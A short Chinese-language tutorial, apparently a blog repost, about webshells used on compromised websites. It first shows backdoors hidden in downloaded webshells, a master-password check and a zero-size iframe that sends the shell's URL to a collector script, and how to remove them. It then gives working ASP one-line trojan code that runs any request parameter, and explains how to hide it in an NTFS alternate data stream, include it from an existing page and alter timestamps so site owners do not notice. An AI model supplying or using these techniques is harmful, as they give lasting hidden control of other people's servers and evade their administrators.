webshell的后门

目录

• 万能密码：
• 收信脚本如下：
• 接单之隐藏一句话木马

一般网上下载的大马或多或少的都会有后门，这些后门直接导致了我们拿的网站被别人顺带拿走了，所以在网上下载的大马必须先检查有没有后门。

万能密码：

end function
if session("hehe")<>userpassthen
if request.form("pass")<>"" then
if request.form("pass")=userpass or 
//将pass的值进行验证，如果输入的pass值等于userpass，代表验证成功
request.form("pass")="1111111" Then
//如果输入的pass值为1111111，也可以登录大马。
session("hehe")=userpasss
response.redirect url
else

当然，这个地方不可能会这么简单，原作者完全可以把userpass赋值成为两个，
添加一个userpass改变的触发条件，在他登录的时候触发这个条件
（比如说如果登录失败的时候将触发userpass值的更新），这样就可以添加一个后门，
而且触发条件的代码与验证代码分隔的较远，也不好查找，这个时候就需要我们把大马的代码逐行分析。
然后再用框架挂马：

<iframe src=后门地址 width=0 height=0></iframe>

这个地方将链接的地址宽度和高度全设置为0，就该页面就隐藏了。
里面的“后门地址”指向自己的脚本收信器，最后将收信脚本放到自己搭建的一个公网服务器上面。

收信脚本如下：

<%url=Request.ServerVariables("HTTP_Referer")
//表示请求的字符转内容，即大马的url地址，然后把url地址保存到当前目录的hehe.txt。
　　set fs=server.CreateObject("Scripting.FileSystemObject")
　　set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
　　file.writeline url
　　file.close
　　set file=nothing
　　set fs=nothing
%>

要提出这种后门首先必须先要破坏大马第二种密码验证，即万能密码。

删除相关的功能代码，然后再查找有没有asp大马页面有没有例如width=0 height=0这样的隐藏url，查找出来将其删除。

接单之隐藏一句话木马

一般我们拿到的shell很容易被发现 或者被删除现在教你们 如何隐藏这是利用NTFS流隐藏你的一句话小马，
这方法，文件写入后，不容易给发现，隐藏性好！

如下是ASP脚本的例子！

NTFS流文件的内容如下 (NTFS流文件 只适用于win系统服务器)

<%
re= request("test")
if re <>"" then
execute re
response.end ‘表示结束，不再处理别的代码
end if
%>

把内容写入到特定位置。
是 :1.jpg 不是 \1.jpg文件写入后，H:\Web\动易\Inc 目录里是看不到文件的！
现在要引导这个一句话文件！格式:<!-#include file="目录:1.jpg"->
我随便选一个文件(最好不要自己新建文件，别人容易发现有新文件)

添加 <!-#include file="inc:1.jpg"->
修改后保存！
一句话木马隐藏基本完成！
当然 H:\Web\动易\Announce.asp 你可以改个一下修改的时间，这样别人就不容易发现有问题！
还有说一下，2003的流，是可以写入文件也可以写入目录的！
你想把一句话马写在目录里也成，文件里也成但建议保存到目录里，因为文件如果修改，流数据将会清空，但目录不会！用菜刀测试成功！

笔记来源于：https://blog.csdn.net/qq_42357070/article/details/82881393